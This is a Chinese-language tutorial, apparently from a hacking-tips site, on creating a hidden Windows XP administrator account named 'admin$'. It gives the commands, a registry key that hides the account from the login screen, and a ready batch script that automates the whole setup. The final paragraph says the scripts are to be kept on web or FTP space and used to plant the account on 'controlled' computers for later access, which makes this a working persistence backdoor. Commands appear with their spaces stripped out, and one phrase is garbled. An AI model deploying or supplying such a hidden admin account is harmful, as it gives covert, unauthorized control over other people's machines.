1.技巧用途:
在计算机中创建一个隐藏的账户,同时也可作为远程登录的用户来远控计算机或者查看计罪拈藉麝算机的磁盘信息。(在虚拟机中进行演示)
2.使用环境:
宿主机:windowsxpsp3
虚拟机:Vmwareworkstation下的windowsxpsp3
3.使用的工具:
A.系统工具:
Regedit.exe
Cmd.exe
B.自建的批处理和注册表:
开启账户及添加隐藏注册表.bat
关闭账户及删除隐藏注册表.bat
4.过程步骤:
1.本地创建隐藏账户和建立隐藏“登录时账户显示”的注册表文件。
netuseradmin$admin/add---在计算机中创建一个用户名为admin$,密码为admin的账户,此时建立的这个带$的账户是隐藏的。我们可以在cmd中运行netuser,可以看到我们发现不了这个用户。打开“计算机管理”中的“本地用户和组”--“用户”中则可以看到存在admin$的账户。
netlocalgroupadministratorsadmin$/add----将admin账户添加到管理员组中,便于以后对计算机进行控制。
至此,本地计算机的隐藏账户建立好了。
下面我们注销计算机,在计算机的登录界面还是可以看到这个admin$的账户。
那么,如何才能将登录界面的admin$账户也隐藏掉呢?
此时我们可以进入注册表中新建一个键,就可以将其隐藏了。键为:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList]中新建一个dword类型的名为admin$的键,其键值为"admin$"=dword:00000000
快速打开方法为,在注册表编辑器regedit.exe中的菜单栏“编辑”中“查找”userlist,查找两次就可以快速定位userlist这个键值了。
保存userlist下的键值为"yincang.reg",便于下面的批处理时使用。
注销计算机,可以发现,此时admin$账户看不到了。
至此,在cmd下的netuser和系统登录界面中都看不到admin$的影子了。唯一可以看到的是计算机管理中的用户下还是可以看到。我们说一般的用户是不会去查看最后一个地方的,这样我们就创建了一个相对隐藏较深的计算机账户。
下面我们先删除掉以上的设置。删除用户,删除注册表键值。
2.批处理编写
创建隐藏账户和添加进入注册表
“开启账户及添加隐藏注册表.bat”
@echooff
netuseradmin$admin/add>nul
netlocalgroupadministratorsadmin$/add>nul
echoWindowsRegistryEditorVersion5.00>>tmp.reg>nul
echo.>>tmp.reg>nul
echo[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>>tmp.reg>nul
echo"admin$"=dword:00000000>>tmp.reg>nul
echo.>>tmp.reg>nul
regedit/stmp.reg>nul
deltmp.reg>nul
删除隐藏账户和删除注册表相关隐藏信息
“关闭账户及删除隐藏注册表.bat”
@echooff
netuseradmin$/del>nul
regdelete"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList"/v"admin$"/f>nul
有了以上两个批处理文件之后,我们就可以留下它们放在自己的网络空间上或者ftp空间中,随时备用,适当的时候可以在受控的计算机中创建一个隐藏的账户,以便我们下次使用这台受控的计算机上的资源。